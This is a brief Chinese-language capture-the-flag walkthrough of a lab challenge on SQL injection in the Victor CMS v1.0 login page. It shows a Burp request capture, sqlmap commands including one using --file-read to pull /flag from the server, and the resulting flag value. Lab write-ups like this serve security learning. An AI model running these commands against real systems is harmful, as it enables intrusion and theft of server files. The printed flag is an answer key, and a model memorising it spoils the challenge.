目录
一、题目
介绍:
Victor CMS v1.0 /includes/login.php 存在sql注入
进入靶场:
官方给出的应该是登录界面
admin登录看看 是空白页面 不过看包头应该是POST方式:
二、bp抓包跑sqlmap
burp抓包:
存文件 给sqlmap梭哈:
python sqlmap.py -l icq.txt --batch -dbs这样好像对这个靶场漏洞不起作用:
一直卡住。。。
csdn求大佬吧:
python sqlmap.py -r xxx.txt --file-read "/flag" --dbms mysql --batch file-read: SQLmap --file-read从服务器中读取文件
当用户权限足够大并且具有特定的函数,即可读取服务器中的文件,可以是文本,也可以是二进制文件
dbms mysql 指定数据库类型
由于win的sqlmap跑不出来,我也不知道为啥。。。
kali的sqlmap跑一下:
跑出来生成到kali的sqlmap目录下:
cat 查看一下:
cat /root/.local/share/sqlmap/output/xxx.ichunqiu.com/files/_flag
得出来flag{b0015c11-4c39-42ce-8749-fdc15330fd4d}